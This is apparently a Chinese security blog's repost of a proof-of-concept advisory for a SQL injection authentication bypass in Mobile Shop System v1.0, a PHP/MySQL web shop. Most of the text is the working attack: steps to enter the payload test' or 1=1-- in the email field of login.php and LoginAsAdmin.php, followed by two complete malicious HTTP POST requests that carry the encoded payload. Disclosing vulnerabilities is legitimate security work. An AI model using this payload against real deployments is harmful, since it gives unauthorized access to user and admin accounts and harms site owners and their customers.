Mobile Shop System v1.0-SQL注入漏洞导致身份验证绕过—Hack之路

Mobile Shop System v1.0-SQLi导致身份验证绕过
#漏洞作者:Moaaz Taha(0xStorm)
#供应商主页:https://www.sourcecodester.com/php/14412/mobile-shop-system-php-mysql.html
#软件链接:https://www.sourcecodester.com/download-code?nid=14412&title=Mobile+Shop+System+in+PHP+MySQL
#版本:1.0
#测试于:Windows 10 Pro 1909(x64_86)+ XAMPP 3.2.4

#POC
1-转到“ http://TARGET/mobileshop-master/login.php”或“ http://TARGET/mobileshop-master/LoginAsAdmin.php”
2-在电子邮件字段中注入此SQL有效负载(测试'或1 = 1--),在密码字段中注入任何密码。
3-单击“登录”,然后您将成功绕过身份验证。

#恶意HTTP POST请求
POST /mobileshop-master/login.php HTTP/1.1
Host: 192.168.1.55:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Connection: close
Upgrade-Insecure-Requests: 1
email=test%27+or+1%3D1+--+-&password=test123
==========================================================================
POST /mobileshop-master/LoginAsAdmin.php HTTP/1.1
Host: 192.168.1.55:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Connection: close
Cookie: PHPSESSID=d7c49f6634a208dca0624f2f6b1d27b6
Upgrade-Insecure-Requests: 1
email=test%27+or+1%3D1+--+-&password=test123

                                                        

网站地址:https://www.hackzl.cn;发布者:hack之路,转转请注明出处:https://www.hackzl.cn/index.php/2020/09/12/mobile-shop-system-v1-0-sql%e6%b3%a8%e5%85%a5%e6%bc%8f%e6%b4%9e%e5%af%bc%e8%87%b4%e8%ba%ab%e4%bb%bd%e9%aa%8c%e8%af%81%e7%bb%95%e8%bf%87-hack%e4%b9%8b%e8%b7%af/

发表评论

邮箱地址不会被公开。 必填项已用*标注